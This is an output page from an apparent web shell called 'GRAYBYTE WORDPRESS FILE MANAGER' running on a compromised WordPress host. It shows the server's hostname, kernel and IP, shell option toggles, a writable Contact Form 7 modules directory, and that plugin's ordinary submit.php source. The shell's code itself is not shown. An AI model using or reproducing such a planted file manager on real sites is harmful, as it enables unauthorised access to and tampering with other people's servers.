✘✘ GRAYBYTE WORDPRESS FILE MANAGER ✘✘

​🇳​​🇦​​🇲​​🇪♯➤ server366.web-hosting.com ​🇻​♯➤ 4.18.0-553.50.1.lve.el8.x86_64 #1 SMP 🇾​♯➤ 2025

𝗛𝗢𝗠𝗘 𝗜𝗗 ♯➤ 67.223.118.204 ♯➤ 𝗔𝗗𝗠𝗜𝗡 𝗜𝗗 216.73.216.243
𝗢𝗣𝗧𝗜𝗢𝗡𝗦 ♯ CRL ♯➤ 𝗢𝗞 ┃ WGT ♯➤ 𝗢𝗞 ┃ SDO ♯➤ 𝗢𝗙𝗙 ┃ PKEX ♯➤ 𝗢𝗙𝗙
𝗗𝗘𝗔𝗖𝗧𝗜𝗩𝗔𝗧𝗘𝗗 ♯➤ 𝗔𝗟𝗟 𝗪𝗢𝗥𝗞𝗜𝗡𝗚....

𝗛𝗢𝗠𝗘
𝗖𝗨𝗥𝗥𝗘𝗡𝗧 𝗙𝗜𝗟𝗘 : /home/builxejc/public_html/wp-content/plugins/contact-form-7/modules//submit.php
<?php
/**
** A base module for [submit]
**/

/* form_tag handler */

add_action( 'wpcf7_init', 'wpcf7_add_form_tag_submit', 10, 0 );

function wpcf7_add_form_tag_submit() {
	wpcf7_add_form_tag( 'submit', 'wpcf7_submit_form_tag_handler' );
}

function wpcf7_submit_form_tag_handler( $tag ) {
	$class = wpcf7_form_controls_class( $tag->type, 'has-spinner' );

	$atts = array();

	$atts['class'] = $tag->get_class_option( $class );
	$atts['id'] = $tag->get_id_option();
	$atts['tabindex'] = $tag->get_option( 'tabindex', 'signed_int', true );

	$value = isset( $tag->values[0] ) ? $tag->values[0] : '';

	if ( empty( $value ) ) {
		$value = __( 'Send', 'contact-form-7' );
	}

	$atts['type'] = 'submit';
	$atts['value'] = $value;

	$atts = wpcf7_format_atts( $atts );

	$html = sprintf( '<input %1$s />', $atts );

	return $html;
}


/* Tag generator */

add_action( 'wpcf7_admin_init', 'wpcf7_add_tag_generator_submit', 55, 0 );

function wpcf7_add_tag_generator_submit() {
	$tag_generator = WPCF7_TagGenerator::get_instance();

	$tag_generator->add( 'submit', __( 'submit', 'contact-form-7' ),
		'wpcf7_tag_generator_submit',
		array( 'version' => '2' )
	);
}

function wpcf7_tag_generator_submit( $contact_form, $options ) {
	$field_types = array(
		'submit' => array(
			'display_name' => __( 'Submit button', 'contact-form-7' ),
			'heading' => __( 'Submit button form-tag generator', 'contact-form-7' ),
			'description' => __( 'Generates a form-tag for a <a href="https://contactform7.com/submit-button/">submit button</a>.', 'contact-form-7' ),
		),
	);

	$tgg = new WPCF7_TagGeneratorGenerator( $options['content'] );

	$formatter = new WPCF7_HTMLFormatter();

	$formatter->append_start_tag( 'header', array(
		'class' => 'description-box',
	) );

	$formatter->append_start_tag( 'h3' );

	$formatter->append_preformatted(
		esc_html( $field_types['submit']['heading'] )
	);

	$formatter->end_tag( 'h3' );

	$formatter->append_start_tag( 'p' );

	$formatter->append_preformatted(
		wp_kses_data( $field_types['submit']['description'] )
	);

	$formatter->end_tag( 'header' );

	$formatter->append_start_tag( 'div', array(
		'class' => 'control-box',
	) );

	$formatter->call_user_func( static function () use ( $tgg, $field_types ) {
		$tgg->print( 'field_type', array(
			'select_options' => array(
				'submit' => $field_types['submit']['display_name'],
			),
		) );

		$tgg->print( 'class_attr' );

		$tgg->print( 'default_value', array(
			'title' => __( 'Label', 'contact-form-7' ),
		) );
	} );

	$formatter->end_tag( 'div' );

	$formatter->append_start_tag( 'footer', array(
		'class' => 'insert-box',
	) );

	$formatter->call_user_func( static function () use ( $tgg, $field_types ) {
		$tgg->print( 'insert_box_content' );
	} );

	$formatter->print();
}


Current_dir [ 𝗪𝗥𝗜𝗧𝗘𝗔𝗕𝗟𝗘 ] Document_root [ 𝗪𝗥𝗜𝗧𝗘𝗔𝗕𝗟𝗘 ]


[ Back ]
𝗡𝗔𝗠𝗘
𝗦𝗜𝗭𝗘
𝗟𝗔𝗦𝗧 𝗧𝗢𝗨𝗖𝗛
𝗨𝗦𝗘𝗥
𝗦𝗧𝗔𝗧𝗨𝗦
𝗙𝗨𝗡𝗖𝗧𝗜𝗢𝗡𝗦
..
--
9 Jun 2026 8.37 AM
builxejc / builxejc
0755
akismet
--
9 Jun 2026 8.37 AM
builxejc / builxejc
0755
constant-contact
--
9 Jun 2026 8.37 AM
builxejc / builxejc
0755
recaptcha
--
9 Jun 2026 8.37 AM
builxejc / builxejc
0755
sendinblue
--
9 Jun 2026 8.37 AM
builxejc / builxejc
0755
stripe
--
9 Jun 2026 8.37 AM
builxejc / builxejc
0755
turnstile
--
9 Jun 2026 8.37 AM
builxejc / builxejc
0755
acceptance.php
7.297 KB
26 Jun 2025 1.13 PM
builxejc / builxejc
0644
checkbox.php
9.879 KB
5 Aug 2025 12.17 PM
builxejc / builxejc
0644
count.php
1.449 KB
18 Feb 2025 11.47 AM
builxejc / builxejc
0644
date.php
6.077 KB
29 Oct 2025 12.57 PM
builxejc / builxejc
0644
disallowed-list.php
1.835 KB
5 Aug 2025 12.17 PM
builxejc / builxejc
0644
doi-helper.php
0.713 KB
19 May 2022 1.52 PM
builxejc / builxejc
0644
file.php
6.94 KB
26 Jun 2025 1.13 PM
builxejc / builxejc
0644
flamingo.php
8.418 KB
5 Aug 2025 12.17 PM
builxejc / builxejc
0644
hidden.php
0.758 KB
23 Nov 2018 9.23 PM
builxejc / builxejc
0644
listo.php
0.737 KB
21 Mar 2024 10.54 AM
builxejc / builxejc
0644
number.php
6.642 KB
29 Oct 2025 12.57 PM
builxejc / builxejc
0644
quiz.php
6.814 KB
26 Jun 2025 1.13 PM
builxejc / builxejc
0644
really-simple-captcha.php
13.447 KB
30 Nov 2025 12.44 PM
builxejc / builxejc
0644
reflection.php
2.266 KB
31 May 2023 9.33 AM
builxejc / builxejc
0644
response.php
0.449 KB
14 May 2020 1.49 PM
builxejc / builxejc
0644
select.php
6.619 KB
29 Oct 2025 12.57 PM
builxejc / builxejc
0644
submit.php
2.702 KB
26 Jun 2025 1.13 PM
builxejc / builxejc
0644
text.php
8.388 KB
29 Oct 2025 12.57 PM
builxejc / builxejc
0644
textarea.php
5.249 KB
29 Oct 2025 12.57 PM
builxejc / builxejc
0644

✘✘ GRAYBYTE WORDPRESS FILE MANAGER @ 2026 CONTACT ME ✘✘
Static GIF Static GIF